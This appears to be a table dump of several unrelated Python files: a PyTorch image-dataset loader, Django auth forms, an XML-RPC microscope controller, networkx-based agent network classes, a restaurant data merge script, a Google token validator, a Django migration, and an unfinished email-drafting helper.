text stringlengths 38 1.54M |
|---|
import torch.utils.data as data
from glob import glob
import matplotlib.pyplot as plt
from torchvision import transforms
from PIL import Image
import random
import os
import numpy as np
import torch
class cudatatest(data.Dataset):
    """Test-set loader for super-resolution triples (LR depth, HR label, guide).

    Expects pre-dumped ``.npy`` arrays of shape (1, H, W, C) under
    ``testset/SR`` named ``x<scale>_LR*.npy`` / ``x<scale>_label*.npy`` /
    ``x<scale>_guide*.npy``. Each sample is returned as three CHW torch
    tensors: (depth_LR, label_HR, guide).
    """

    def __init__(self, scale):
        super(cudatatest, self).__init__()
        base = os.path.join('testset', 'SR', 'x' + str(scale))
        # sort so the three lists line up sample-by-sample
        self.imgnames_LR = sorted(glob(base + '_LR' + '*.npy'))
        self.imgnames_HR = sorted(glob(base + '_label' + '*.npy'))
        self.imgnames_guide = sorted(glob(base + '_guide' + '*.npy'))

    @staticmethod
    def _load(path):
        """Load one (1, H, W, C) array and return it as a (C, H, W) tensor."""
        arr = np.load(path, allow_pickle=True)
        arr = np.transpose(arr, (0, 3, 1, 2))  # NHWC -> NCHW
        # Bug fix: the original called np.squeeze on a torch tensor, which
        # silently converts it back to a numpy array; squeeze on the tensor
        # keeps it a torch.Tensor.
        return torch.from_numpy(arr).squeeze(0)

    def __getitem__(self, item):
        # Use locals instead of instance attributes: writing per-item state
        # to ``self`` is not safe with multi-worker DataLoaders.
        depth = self._load(self.imgnames_LR[item])
        gt = self._load(self.imgnames_HR[item])
        guide = self._load(self.imgnames_guide[item])
        return (depth, gt, guide)

    def __len__(self):
        return len(self.imgnames_LR)
if __name__ == '__main__':
    # Smoke test: iterate one batch of the x4 test set.
    # Bug fix: the class defined above is ``cudatatest``; ``msdatatest``
    # does not exist in this module and raised NameError.
    dataset = cudatatest(4)
    dataloader = data.DataLoader(dataset, batch_size=1)
    for b1, (img_L, img_gt, img_RGB) in enumerate(dataloader):
        # print(b1)
        print(img_L.shape, img_RGB.shape)
"""
BSD 3-Clause License
Copyright (c) 2016-2019 Russ 'trdwll' Treadwell. All rights reserved.
"""
from django import forms
from django.contrib.auth.models import User
#from . models import UserProfile
from django.contrib.auth.forms import UserCreationForm
from django.utils.translation import ugettext_lazy as _
from captcha.fields import CaptchaField
class RegistrationForm(UserCreationForm):
    """Sign-up form: username, double password entry and a CAPTCHA.

    Email collection is intentionally disabled (see the commented-out
    ``email`` field below).
    """

    captcha = CaptchaField()
    # Login name; uniqueness is enforced by the User model itself.
    username = forms.CharField(
        widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Username'}),
        min_length=3, label='Username', required=True, help_text='Choose a unique username to login with.')
    # email = forms.CharField(
    #     widget=forms.EmailInput(attrs={'class': 'form-control', 'placeholder': 'Email Address'}),
    #     min_length=5, label='Email Address', required=True,
    #     help_text='Feel free to use a fake or even a disposable email address. We don\'t verify the email, it\'s only used to recover the account or if we need to contact you.')
    # Shared widget placeholder for both password fields.
    placeholder = 'Must be at least 8 characters'
    password1 = forms.CharField(
        widget=forms.PasswordInput(attrs={'class': 'form-control', 'value': '', 'placeholder': placeholder}),
        min_length=8, label='Password', required=True, help_text='Enter your password!')
    password2 = forms.CharField(
        widget=forms.PasswordInput(attrs={'class': 'form-control', 'value': '', 'placeholder': placeholder}),
        min_length=8, label='Confirm Password', required=True, help_text='Confirm your password!')

    class Meta:
        model = User
        fields = [
            'username',
            # 'email',
            'password1',
            'password2',
            'captcha'
        ]
class LoginForm(forms.Form):
    """Login form: username, password and a CAPTCHA.

    NOTE(review): ``Meta`` on a plain ``forms.Form`` has no effect in
    Django; it appears to be kept only for symmetry with the other forms.
    """

    username = forms.CharField(
        widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Username'}),
        min_length=3, label='Username', required=True)
    password = forms.CharField(
        widget=forms.PasswordInput(attrs={'class': 'form-control', 'value': '', 'placeholder': 'Must be at least 8 characters'}),
        min_length=8, label='Password', required=True, help_text='Enter your password!')
    captcha = CaptchaField()

    class Meta:
        fields = [
            'username',
            'password',
            'captcha'
        ]
class UpdateProfileForm(forms.ModelForm):
    """Password-change form for an already-authenticated user.

    NOTE(review): ``Meta.fields`` lists names that are form fields, not
    ``User`` model fields -- confirm Django accepts this ModelForm
    configuration.
    """

    def __init__(self, *args, **kwargs):
        # The view passes the current user via the ``user`` kwarg.
        user = kwargs.pop('user', None)
        super(UpdateProfileForm, self).__init__(*args, **kwargs)
        #self.fields['username'] = forms.CharField(widget=forms.TextInput(attrs={'value': user}))
        # NOTE(review): result is unused; its only effect is raising
        # User.DoesNotExist for an unknown username -- confirm intent.
        userinfo = User.objects.get(username=user)
        #useremail = userinfo.email
        #self.fields['email'] = forms.CharField(
        #    widget=forms.EmailInput(attrs={'class': 'form-control', 'placeholder': 'Email Address', 'value': useremail}),
        #    min_length=5, label='Email Address', required=True)

    # Shared widget placeholder for the three password fields.
    placeholder = 'Must be at least 8 characters'
    passwordcur = forms.CharField(
        widget=forms.PasswordInput(attrs={'class': 'form-control', 'value': '', 'placeholder': placeholder}),
        min_length=8, label='Current Password', required=True, help_text='Enter your current password to verify the change.')
    passwordnew = forms.CharField(
        widget=forms.PasswordInput(attrs={'class': 'form-control', 'value': '', 'placeholder': placeholder}),
        min_length=8, label='New Password', required=False, help_text='Make sure your new password isn\'t use anywhere else.')
    passwordconf = forms.CharField(
        widget=forms.PasswordInput(attrs={'class': 'form-control', 'value': '', 'placeholder': placeholder}),
        min_length=8, label='Confirm New Password', required=False, help_text='Confirm your new password!')

    class Meta:
        model = User
        fields = [
            # 'username',
            'passwordcur',
            # 'email',
            'passwordnew',
            'passwordconf'
        ]
# class RecoverAccountForm(forms.ModelForm):
# captcha = CaptchaField()
# username = forms.CharField(
# widget=forms.TextInput(attrs={'class': 'form-control', 'value': '', 'placeholder': 'Enter your Username.'}),
# min_length=4, label='Username', required=True)
# email = forms.CharField(
# widget=forms.EmailInput(attrs={'class': 'form-control', 'value': '', 'placeholder': 'Enter your Email.'}),
# min_length=5, label='Email', required=True)
# recovery_key = forms.CharField(
# widget=forms.TextInput(attrs={'class': 'form-control', 'value': '', 'placeholder': 'Enter your recovery key.'}),
# min_length=5, label='Recovery Key', required=True)
# class Meta:
# model = UserProfile
# fields = [
# 'username',
# 'email',
# 'recovery_key',
# 'captcha'
# ]
# class RecoverAccountResetForm(forms.ModelForm):
# placeholder = 'Must be at least 8 characters'
# password1 = forms.CharField(
# widget=forms.PasswordInput(attrs={'class': 'form-control', 'value': '', 'placeholder': placeholder}),
# min_length=8, label='New Password', required=True, help_text='Make sure your new password isn\'t use anywhere else.')
# password2 = forms.CharField(
# widget=forms.PasswordInput(attrs={'class': 'form-control', 'value': '', 'placeholder': placeholder}),
# min_length=8, label='Confirm New Password', required=True, help_text='Confirm your new password!')
# class Meta:
# model = User
# fields = [
# 'password1',
# 'password2'
# ]
# class RecoveryCodeSetupForm(forms.Form):
# password1 = forms.CharField(
# widget=forms.PasswordInput(attrs={'class': 'form-control', 'value': '', 'placeholder': 'Must be at least 8 characters'}),
# min_length=8, label='Current Password', required=True, help_text='Your current password')
# recovery_key = forms.CharField(
# widget=forms.TextInput(attrs={'class': 'form-control', 'value': '', 'placeholder': 'Enter your Recovery Key.'}),
# min_length=4, label='Recovery Key', required=True)
# class Meta:
# fields = [
# 'password1',
# 'recovery_key'
# ] |
from os import path
import serial
from time import sleep
from datetime import datetime
from twisted.internet import endpoints
from twisted.web import xmlrpc, server
from AutoFocus import AutoFocus, Camera
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
# create a file handler
handler = logging.FileHandler('PANAKEIA.log')
handler.setLevel(logging.INFO)
# create a logging format
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(handler)
class Microscope:
    """Serial front end to the Arduino microscope-stage controller.

    Protocol (inferred from run_command): commands are newline-terminated
    strings; the Arduino replies line-by-line until an 'OK' line, using
    'ERR:' for failures and 'RETURN:' for values.
    Python 2 code -- note the print statement in __init__.
    """

    def __init__(self, port):
        """Open the serial link at 9600 baud and reset the Arduino."""
        self.ser = serial.Serial(port, 9600)
        #Flash the DTR pin to reset the Arduino (Needed so the Arduino is in a known state)
        self.ser.setDTR(False)
        sleep(0.22)
        self.ser.setDTR(True)
        # Consume (and echo) the single banner line emitted after reset.
        for index in range(1):
            line = self.ser.readline()
            print index, line

    def __del__(self):
        # Best-effort cleanup of the serial handle.
        self.ser.close()

    def run_command(self, command):
        """Send one command and read replies until 'OK'.

        Returns the payload of a 'RETURN:' line ('' when none was sent);
        raises Exception on an 'ERR:' line.
        """
        logger.info('Running command %s', command)
        self.ser.write(command)
        line = ''
        return_value = ''
        while line != 'OK\r\n':
            line = self.ser.readline()
            logger.info('Response %s', line)
            if line.startswith('ERR:'):
                raise Exception(line)
            if line.startswith('RETURN:'):
                return_value = line.split(':')[1].strip()
        return return_value

    def check_axis(self, axis):
        """Checks that the axis string corresponds to a valid axis"""
        if axis not in ['x', 'y', 'z']:
            raise Exception('Not a valid axis!')

    def calibrate(self):
        """Starts the calibration procedure for the Microscope"""
        command = 'calibrate\n'
        self.run_command(command)

    def is_calibrated(self):
        """Check if the microscope is calibrated"""
        command = 'is_calibrated\n'
        line = self.run_command(command)
        if line == '1':
            return True
        else:
            return False

    def get_length(self, axis):
        """Returns the length of the specified axis"""
        self.check_axis(axis)
        command = axis + '_get_length\n'
        length = self.run_command(command)
        return int(length)

    def get_position(self, axis):
        """Get the current position of the specified axis"""
        self.check_axis(axis)
        command = axis + '_get_position\n'
        position = self.run_command(command)
        return int(position)

    def get_distance_to_go(self, axis):
        """Get the distance between current and target position of the specified axis"""
        self.check_axis(axis)
        command = axis + '_get_distance_to_go\n'
        distance = self.run_command(command)
        return int(distance)

    def get_state(self, axis):
        """Get the current state of the motor STOPPED=0,FWD=1,BACKWAD=-1"""
        self.check_axis(axis)
        command = axis + '_get_state\n'
        state = self.run_command(command)
        return int(state)

    def move(self, axis, steps):
        """Move the specified axis relative to current position"""
        self.check_axis(axis)
        command = axis + '_move ' + str(steps) + '\n'
        self.run_command(command)

    def move_to(self, axis, position):
        """Move the specified axis to an absolute position"""
        self.check_axis(axis)
        command = axis + '_move_to ' + str(position) + '\n'
        self.run_command(command)

    def wait_to_finish(self, axis):
        """Wait (polling once per second) for the axis to complete work"""
        state = self.get_distance_to_go(axis)
        while state != 0:
            sleep(1)
            state = self.get_distance_to_go(axis)

    def set_mode(self, axis, mode):
        """Set microstepping mode of the specified axis"""
        self.check_axis(axis)
        command = axis + '_set_mode ' + str(mode) + '\n'
        self.run_command(command)

    def set_length(self, axis, length):
        """Set working length of the specified axis"""
        self.check_axis(axis)
        command = axis + '_set_length ' + str(length) + '\n'
        self.run_command(command)

    def set_factor(self, axis, factor):
        """Set the step factor of the specified axis"""
        self.check_axis(axis)
        command = axis + '_set_factor ' + str(factor) + '\n'
        self.run_command(command)

    def mark_calibrated(self):
        """Loaded previous calibration - mark as calibrated"""
        command = 'mark_calibrated' + '\n'
        self.run_command(command)
class MicroscopeServer(xmlrpc.XMLRPC):
    """Twisted XML-RPC facade over a Microscope, Camera and AutoFocus."""

    def __init__(self, serial_port, allowNone=True, useDateTime=False):
        self.serial_port = serial_port
        xmlrpc.XMLRPC.__init__(self, allowNone, useDateTime)

    def xmlrpc_initialize(self):
        """Open the scope, apply a saved calibration, build camera/autofocus.

        Bug fix: camera and autofocus creation used to live inside the
        config ``try`` block, so a missing ./PANAKEIA.conf silently left
        ``self.camera`` / ``self.focus_control`` unset. They are now
        created unconditionally; only the calibration load is optional.
        """
        import json
        self.microscope = Microscope(self.serial_port)
        try:
            with open('./PANAKEIA.conf') as infile:
                json_data = json.load(infile)
            self.microscope.set_length('x', json_data['x_length'])
            self.microscope.set_length('y', json_data['y_length'])
            self.microscope.set_length('z', json_data['z_length'])
            self.microscope.mark_calibrated()
        except IOError:
            # No saved calibration -- start uncalibrated.
            pass
        self.camera = Camera('./')
        max_sweep_steps = 8
        self.focus_control = AutoFocus(self.microscope, self.camera, logger,
                                       sweepsteps=4, steps=20,
                                       min_steps=1, max_sweep_steps=max_sweep_steps,
                                       number_of_times=2, precision=0.99)

    def xmlrpc_raw(self, command):
        """Send a raw protocol command; return its response value."""
        ret = self.microscope.run_command(command)
        return ret

    def xmlrpc_calibrate(self):
        """Start the stage calibration procedure."""
        self.microscope.calibrate()

    def xmlrpc_is_calibrated(self):
        """Return True when the stage reports itself calibrated."""
        calibrated = self.microscope.is_calibrated()
        return calibrated

    def xmlrpc_get_length(self, axis):
        """Return the working length of the given axis."""
        length = self.microscope.get_length(axis)
        return length

    def xmlrpc_get_position(self, axis):
        """Return the current position of the given axis."""
        position = self.microscope.get_position(axis)
        return position

    def xmlrpc_get_distance_to_go(self, axis):
        """Return the remaining distance to the axis target position."""
        distance = self.microscope.get_distance_to_go(axis)
        return distance

    def xmlrpc_get_state(self, axis):
        """Return the motor state (STOPPED=0, FWD=1, BACKWARD=-1)."""
        state = self.microscope.get_state(axis)
        return state

    def xmlrpc_move(self, axis, position):
        """Move the axis relative to its current position."""
        self.microscope.move(axis, position)

    def xmlrpc_move_to(self, axis, position):
        """Move the axis to an absolute position."""
        self.microscope.move_to(axis, position)

    def xmlrpc_set_mode(self, axis, mode):
        """Set the microstepping mode of the axis."""
        self.microscope.set_mode(axis, mode)

    def xmlrpc_set_length(self, axis, length):
        """Set the working length of the axis."""
        self.microscope.set_length(axis, length)

    def xmlrpc_set_factor(self, axis, factor):
        """Set the step factor of the axis."""
        self.microscope.set_factor(axis, factor)

    def xmlrpc_save_calibration(self):
        """Persist the axis lengths to ./PANAKEIA.conf (when calibrated)."""
        if self.microscope.is_calibrated():
            import json
            x_length = self.microscope.get_length('x')
            y_length = self.microscope.get_length('y')
            z_length = self.microscope.get_length('z')
            json_data = {'x_length': x_length,
                         'y_length': y_length,
                         'z_length': z_length}
            with open("./PANAKEIA.conf", "w") as outfile:
                json.dump(json_data, outfile, indent=4)

    def xmlrpc_focus(self):
        """Run a full autofocus cycle."""
        self.focus_control.full()

    def xmlrpc_scan(self, slide_id):
        """Scan the slide identified by slide_id."""
        self.focus_control.scan(slide_id)

    def xmlrpc_take_picture(self):
        """Takes a photograph with datetime string for filename"""
        x_pos = self.microscope.get_position('x')
        y_pos = self.microscope.get_position('y')
        z_pos = self.microscope.get_position('z')
        # Bug fix: return the saved path so the caller learns the filename
        # (it was previously computed and discarded).
        image_path = self.camera.snapshot(x_pos, y_pos, z_pos)
        return image_path
if __name__ == '__main__':
    # Expose the microscope over XML-RPC on TCP port 7080.
    from twisted.internet import reactor

    site = server.Site(MicroscopeServer('/dev/ttyACM0'))
    endpoints.TCP4ServerEndpoint(reactor, 7080).listen(site)
    reactor.run()
|
import networkx as nx
from numpy.random import random, choice, shuffle
from epidag.factory import get_workshop
import epidag.factory.arguments as vld
from abc import ABCMeta, abstractmethod
__author__ = 'TimeWizard'
__all__ = ['INetwork', 'NetworkLibrary', 'NetworkSet',
'NetworkGNP', 'NetworkBA', 'NetworkProb']
class INetwork(metaclass=ABCMeta):
    """Abstract interface every agent network implementation must satisfy."""

    def __init__(self):
        # Display name; concrete networks/factories may overwrite it.
        self.Name = 'Network'
        # Cached JSON definition, when the network was built from one.
        self.json = None

    @abstractmethod
    def initialise(self):
        """Reset internal state before (re)use."""
        pass

    @abstractmethod
    def add_agent(self, ag):
        """Insert an agent into the network."""
        pass

    @abstractmethod
    def remove_agent(self, ag):
        """Remove an agent from the network."""
        pass

    @abstractmethod
    def reform(self):
        """Re-sample the topology while keeping the agent population."""
        pass

    @abstractmethod
    def degree(self, ag):
        """Number of neighbours of ag."""
        pass

    @abstractmethod
    def cluster(self, ag):
        """Clustering coefficient of ag."""
        pass

    @abstractmethod
    def match(self, net_src, ags_new):
        """Rebuild this network from net_src, mapping agents via ags_new."""
        pass

    @abstractmethod
    def to_json(self):
        """Serialize the network definition."""
        return self.json
class Network(INetwork, metaclass=ABCMeta):
    """Base class for networks backed by an undirected networkx graph."""

    def __init__(self):
        INetwork.__init__(self)
        self.Graph = nx.Graph()

    def __getitem__(self, ag):
        """Neighbour list of ag; unknown agents yield an empty list."""
        try:
            neighbours = self.Graph[ag]
        except KeyError:
            return []
        return list(neighbours.keys())

    def initialise(self):
        pass

    def add_agent(self, ag):
        self.Graph.add_node(ag)

    def remove_agent(self, ag):
        self.Graph.remove_node(ag)

    def degree(self, ag):
        return self.Graph.degree(ag)

    def cluster(self, ag):
        return nx.clustering(self.Graph, ag)

    def match(self, net_src, ags_new):
        """Copy net_src's edges, translated through the ags_new name map."""
        for src, dst in net_src.Graph.edges():
            self.Graph.add_edge(ags_new[src.Name], ags_new[dst.Name])
class NetworkGNP(Network):
    """Erdos-Renyi G(n, p) network: each pair is linked with probability P."""

    def __init__(self, p):
        Network.__init__(self)
        self.P = p

    def add_agent(self, ag):
        """Add ag and link it to every existing node with probability P."""
        self.Graph.add_node(ag)
        for ne in self.Graph.nodes():
            if ne is not ag and random() < self.P:
                self.Graph.add_edge(ag, ne)

    def reform(self):
        """Re-draw all edges while keeping the node set."""
        new = nx.Graph()
        # Bug fix: Graph.node was removed in networkx 2.4; use .nodes().
        new.add_nodes_from(self.Graph.nodes())
        g = nx.gnp_random_graph(len(self.Graph), self.P, directed=False)
        # Bug fix: nodes.data().keys() is not valid; enumerate the nodes
        # directly to map the sampled integer graph onto the agents.
        idmap = {i: ag for i, ag in enumerate(new.nodes())}
        for u, v in g.edges():
            new.add_edge(idmap[u], idmap[v])
        self.Graph = new

    def __repr__(self):
        return 'GNP(N={}, P={})'.format(len(self.Graph), self.P)

    __str__ = __repr__

    def to_json(self):
        return {'Name': self.Name, 'Type': 'GNP', 'p': self.P}
class NetworkProb(INetwork):
    """Two-category network: with probability P an agent joins a fully
    connected 'Inside' clique; otherwise it is isolated ('Outside')."""

    def __init__(self, p):
        INetwork.__init__(self)
        self.Outside = list()
        self.Inside = list()
        self.P = p

    def __getitem__(self, ag):
        if ag in self.Inside:
            return [nei for nei in self.Inside if ag is not nei]
        return []

    def add_agent(self, ag):
        if random() < self.P:
            self.Inside.append(ag)
        else:
            self.Outside.append(ag)

    def cluster(self, ag):
        # todo: clustering coefficient not yet defined for this topology
        return 0

    def degree(self, ag):
        if ag in self.Outside:
            return 0
        else:
            return len(self.Inside) - 1

    def initialise(self):
        self.Outside = list()
        self.Inside = list()

    def match(self, net_src, ags_new):
        self.Outside = [ags_new[ag.Name] for ag in net_src.Outside]
        self.Inside = [ags_new[ag.Name] for ag in net_src.Inside]

    def remove_agent(self, ag):
        # Bug fix: an agent lives in exactly one of the two lists; removing
        # from both unconditionally always raised ValueError on the other.
        if ag in self.Outside:
            self.Outside.remove(ag)
        elif ag in self.Inside:
            self.Inside.remove(ag)

    def reform(self):
        # Bug fix: reset the partition before re-assigning, otherwise every
        # agent was appended a second time.
        ags = list(self.Outside) + list(self.Inside)
        self.initialise()
        for ag in ags:
            self.add_agent(ag)

    def __repr__(self):
        n = len(self.Inside) + len(self.Outside)
        return 'Prob(N={}, P={})'.format(n, self.P)

    __str__ = __repr__

    def to_json(self):
        return {'Name': self.Name, 'Type': 'Prob', 'p': self.P}
class NetworkBA(Network):
    """Barabasi-Albert preferential-attachment network, m edges per new node."""

    def __init__(self, m):
        Network.__init__(self)
        self.M = m
        # Node pool where each node appears once per incident edge; uniform
        # sampling from it implements preferential attachment.
        self.__repeat = list()

    def add_agent(self, ag):
        """
        Add an agent into this network; adopted from barabasi_albert_graph in Networkx package
        :param ag: an agent in the model
        :type ag: Agent
        """
        self.Graph.add_node(ag)
        num = len(self.Graph)
        if num < self.M:
            # Too few nodes to attach yet; hold for the seed stage.
            self.__repeat.append(ag)
            return
        elif num == self.M:
            # Bug fix: compare with '==' -- 'is' relied on CPython small-int
            # caching and breaks for larger M.
            agl = [ag] * int(self.M)
            self.Graph.add_edges_from(zip(agl, self.__repeat))
            self.__repeat.extend(agl)
            return
        targets = set()
        while len(targets) < self.M:
            targets.add(choice(self.__repeat))
        agl = [ag] * self.M
        self.Graph.add_edges_from(zip(agl, targets))
        self.__repeat.extend(agl)
        # Bug fix: the attachment targets gained an edge too; the reference
        # barabasi_albert_graph algorithm re-adds them to the pool as well.
        self.__repeat.extend(targets)

    def remove_agent(self, ag):
        # Purge the agent from the attachment pool as well as the graph.
        self.__repeat = [a for a in self.__repeat if a is not ag]
        Network.remove_agent(self, ag)

    def reform(self):
        """Re-sample the whole topology, keeping the node set.

        NOTE(review): the attachment pool is not rebuilt here, so later
        add_agent calls still sample the pre-reform degrees -- confirm.
        """
        new = nx.Graph()
        # Bug fix: Graph.node / new.node were removed in networkx 2.4.
        new.add_nodes_from(self.Graph.nodes())
        g = nx.barabasi_albert_graph(len(self.Graph), self.M)
        ids = list(new.nodes())
        shuffle(ids)
        idmap = {i: ag for i, ag in enumerate(ids)}
        for u, v in g.edges():
            new.add_edge(idmap[u], idmap[v])
        self.Graph = new

    def match(self, net_src, ags_new):
        Network.match(self, net_src, ags_new)
        # Name mangling resolves to _NetworkBA__repeat on the source too.
        self.__repeat = [ags_new[a.Name] for a in net_src.__repeat]

    def __repr__(self):
        return 'Barabasi_Albert(N={}, M={})'.format(len(self.Graph), self.M)

    __str__ = __repr__

    def to_json(self):
        return {'Name': self.Name, 'Type': 'BA', 'm': self.M}
class NetworkSet:
    """A named collection of INetwork instances kept in sync over one agent pool."""

    def __init__(self):
        self.Nets = dict()

    def __setitem__(self, key, value):
        if not isinstance(value, INetwork):
            raise AttributeError('Network object should inherit from INetwork')
        self.Nets[key] = value

    def __getitem__(self, item):
        return self.Nets[item]

    def __contains__(self, item):
        return item in self.Nets

    def list(self):
        """Names of all registered networks."""
        return [name for name in self.Nets]

    def append(self, net_name, net):
        """Register a network under net_name (must be an INetwork)."""
        if not isinstance(net, INetwork):
            raise AttributeError('Network object should inherit from INetwork')
        self.Nets[net_name] = net

    def append_from_json(self, net_name, js):
        """Build a network from a JSON definition and register it."""
        self.append(net_name, NetworkLibrary.create_from_json(js))

    def append_from_def(self, net_name, df, loc=None):
        """Build a network from a definition string and register it."""
        self.append(net_name, NetworkLibrary.parse(df, loc=loc))

    def reform(self, net=None):
        """Re-sample one network (by name) or all of them."""
        if net:
            try:
                self.Nets[net].reform()
            except KeyError:
                raise KeyError('No this net')
        else:
            for entry in self.Nets.values():
                entry.reform()

    def add_agent(self, ag):
        """Insert ag into every registered network."""
        for entry in self.Nets.values():
            entry.add_agent(ag)

    def remove_agent(self, ag):
        """Remove ag from every registered network."""
        for entry in self.Nets.values():
            entry.remove_agent(ag)

    def neighbours_of(self, ag, net=None):
        """Neighbours of ag in one network, or a dict over all networks."""
        if net:
            try:
                return list(self.Nets[net][ag])
            except KeyError:
                return list()
        return {name: list(entry[ag]) for name, entry in self.Nets.items()}

    def neighbour_set_of(self, ag):
        """Union of ag's neighbours across every network."""
        collected = set()
        for entry in self.Nets.values():
            try:
                collected.update(entry[ag])
            except KeyError:
                pass
        return collected

    def clear(self, net=None):
        """Clear one network (by name) or all of them."""
        if net:
            try:
                self.Nets[net].clear()
            except KeyError:
                pass
        else:
            for entry in self.Nets.values():
                entry.clear()

    def match(self, nets_src, ags_new):
        """Rebuild every network from its counterpart in nets_src."""
        for name, src in nets_src.Nets.items():
            self[name].match(src, ags_new)

    def __repr__(self):
        return '[{}]'.format(', '.join(['{}: {}'.format(*it) for it in self.Nets.items()]))

    def __str__(self):
        return '[{}]'.format('\n'.join(['\t{}: {}'.format(*it) for it in self.Nets.items()]))
# Register the concrete network types with the epidag factory so they can
# be instantiated from JSON / definition strings.
NetworkLibrary = get_workshop('Networks')
NetworkLibrary.register('BA', NetworkBA, [vld.PositiveInteger('m')], ['name'])
NetworkLibrary.register('GNP', NetworkGNP, [vld.Prob('p')], ['name'])
NetworkLibrary.register('Category', NetworkProb, [vld.Prob('p')], ['name'])

if __name__ == '__main__':
    # Smoke test: build each network type, then a NetworkSet of 100 agents.
    ns1 = NetworkBA(m=2)
    ns2 = NetworkGNP(p=0.3)
    ns3 = NetworkProb(p=0.2)
    for nod in range(20):
        ns1.add_agent('Ag{}'.format(nod))
        ns2.add_agent('Ag{}'.format(nod))
        ns3.add_agent('Ag{}'.format(nod))
    # ns1.reform()
    ag1 = ns1['Ag1']
    nsc = NetworkSet()
    nsc['N1'] = NetworkBA(m=2)
    nsc['N2'] = NetworkGNP(p=0.3)
    for nod in range(100):
        nsc.add_agent('Ag{}'.format(nod))
    print(nsc.neighbours_of('Ag1'))
    print(nsc.neighbours_of('Ag2', 'N1'))
|
import json
from pprint import pprint
import csv
hashmap = {}  # objectID (str) -> restaurant JSON object
result = []   # merged restaurant records to dump at the end
# create hashmap -- mapping of objectID & index of object from restaurants_list.csv
with open('restaurants_list.json') as data_file:
    restaurant_data = json.load(data_file)
    for idx, obj in enumerate(restaurant_data):
        objectID = obj['objectID']
        hashmap[str(objectID)] = obj
# print hashmap
# iterate csv file -- lookup objectId from hashmap, assign attributes to json object
# NOTE(review): Python 2 script ('rb' csv mode, print statements).
with open('restaurants_info.csv', 'rb') as info_file:
    reader = csv.reader(info_file)
    next(reader, None)  # skip the headers
    for row in reader:
        # The file is actually ';'-delimited: undo the default ','-split
        # and re-split on ';'.
        column = ''.join(row).split(';')
        objectID = str(column[0])
        restaurant = hashmap[objectID]
        #add additional info from csv file
        restaurant['food_type'] = column[1]
        restaurant['stars_count'] = float(column[2])
        restaurant['reviews_count'] = column[3]
        restaurant['neighborhood'] = column[4]
        restaurant['phone_number'] = column[5]
        restaurant['price_range'] = column[6]
        restaurant['dining_style'] = column[7]
        options = restaurant['payment_options']
        #clean up payment options
        # Cards on the Discover network imply Discover acceptance.
        if ('Diners Club' in options or 'Carte Blanche' in options or 'JCB' in options) and ('Discover' not in options):
            restaurant['payment_options'].append('Discover')
        restaurant['payment_options'] = [opt for opt in options if opt not in ('Diners Club', 'Carte Blanche', 'JCB', 'Pay with OpenTable')]
        print restaurant
        result.append(restaurant)
# output file
print result
print len(result)
with open('output_restaurants1.json', 'w') as outfile:
    json.dump(result, outfile)
|
from oauth2client import client, crypt
CLIENT_ID = '728044119950-mpcea0183l7c87lflutdide1vfdmvjrb.apps.googleusercontent.com'
def validate_user_id(userId):
    """Verify a Google ID token and return the stable user id ('sub').

    Returns -1 when the caller passes -1 or when verification fails.
    """
    # (Receive token by HTTPS POST)
    if userId == -1:
        print('USER ID ENTERED AS -1')
        return -1
    try:
        idinfo = client.verify_id_token(userId, CLIENT_ID)
        # Or, if multiple clients access the backend server:
        # idinfo = client.verify_id_token(token, None)
        # if idinfo['aud'] not in [CLIENT_ID_1, CLIENT_ID_2, CLIENT_ID_3]:
        #     raise crypt.AppIdentityError("Unrecognized client.")
        issuer = idinfo['iss']
        if issuer not in ('accounts.google.com', 'https://accounts.google.com'):
            raise crypt.AppIdentityError("Wrong issuer.")
        # If auth request is from a G Suite domain:
        # if idinfo['hd'] != GSUITE_DOMAIN_NAME:
        #     raise crypt.AppIdentityError("Wrong hosted domain.")
    except crypt.AppIdentityError:
        print('USER ID PARSED TO -1')
        return -1
    return idinfo['sub']
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-07-01 01:47
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Replaces the old ``Shops`` model with ``Shop``: creates the new table,
    # repoints ``Photo.shop``'s foreign key at it, then drops ``Shops``.
    # Auto-generated by Django 1.11.2 -- edit with care.

    dependencies = [
        ('oaiso', '0033_auto_20170701_1036'),
    ]

    operations = [
        migrations.CreateModel(
            name='Shop',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('shop_name', models.TextField()),
                ('budget_min', models.IntegerField(blank=True, null=True)),
                ('budget_max', models.IntegerField(blank=True, null=True)),
                ('review', models.TextField(blank=True, null=True)),
                ('tel', models.BigIntegerField(blank=True, null=True)),
                ('address1', models.TextField()),
                ('address2', models.TextField()),
                ('address3', models.TextField()),
                ('address4', models.TextField()),
                ('lat', models.DecimalField(decimal_places=13, max_digits=16)),
                ('lng', models.DecimalField(decimal_places=13, max_digits=16)),
            ],
        ),
        migrations.AlterField(
            model_name='photo',
            name='shop',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='oaiso.Shop'),
        ),
        migrations.DeleteModel(
            name='Shops',
        ),
    ]
|
import re
import pandas as pd
from step4 import *
import imaplib
import time
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from values import *
def fetchname(x):
    """Extract the first name greeted after "Hi" in an email body.

    Non-word characters are collapsed to spaces, a leading "Hi Rekha"
    greeting (addressed to us) is dropped, and the word following the
    remaining "Hi" is returned. Robustness fix: returns '' when no
    "Hi <name>" is present, where the original raised ValueError /
    IndexError (callers already treat a falsy name as "no name").
    """
    cleaned = re.sub('\W+', ' ', x).strip()
    # Drop the greeting aimed at us so we find the other person's name.
    cleaned = cleaned.replace('Hi Rekha', '')
    words = cleaned.split()
    try:
        next_word = words[words.index('Hi') + 1]
    except (ValueError, IndexError):
        # "Hi" absent, or nothing follows it.
        return ''
    # Kept from the original; '>' is normally already gone after re.sub.
    return next_word.replace('>', ' ')
def draft(fromaddr, toaddr, messagebody, cc, subject):
    """Save an HTML message into the Gmail Drafts folder over IMAP.

    Relies on module-level ``username`` / ``password`` credentials.
    """
    msg = MIMEMultipart('Mixed')
    msg['Subject'] = subject
    msg['From'] = fromaddr
    msg['to'] = toaddr
    msg['cc'] = cc
    # message['bcc'] = 'testbcc@test.com'
    msg.attach(MIMEText(messagebody, 'html'))
